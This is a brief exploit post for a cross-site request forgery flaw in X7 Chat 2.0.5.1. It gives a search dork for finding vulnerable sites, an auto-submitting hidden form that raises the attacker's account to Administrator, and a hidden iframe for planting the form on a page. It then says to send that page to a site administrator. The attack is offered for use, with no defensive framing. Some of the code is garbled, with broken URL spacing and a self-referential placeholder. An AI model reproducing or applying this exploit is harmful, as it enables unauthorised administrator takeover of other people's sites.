Title: X7 chat 2.0.5.1 csrf Add Admin Exploit
Keywords: intitle: "chat room" "powered by X7 chat 2.0.5"
Author: dennspec download address:
Http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
Affected Versions: <= 2.0.5.1
First, register and obtain a user name.
(Frame.html in path of your main HTML page)
<HTML>
<Body onload = "document. XForm. Submit ();">
<Form name = "XForm" Action = "http: // www.2cto.com/x7path/index. php? Act = adminpanel & cp_page = users & update = yourusername"
Method = "Post">
<Input type = "hidden" name = "username" value = "yourusername"/>
<Input type = "hidden" name = "usergroup" value = "Administrator"/>
</Form>
</Body>
</Html>
Replace http://www.xxx..com/x7path/for your destination address. Don't forget to replace yourusername with yourusername.
Add this code to inside body tag of main HTML page:
<IFRAME Style = "display: none;" src = "frame.html"> </iframe>
And... upload Main Page and frame.html.
Send this page to any administrator...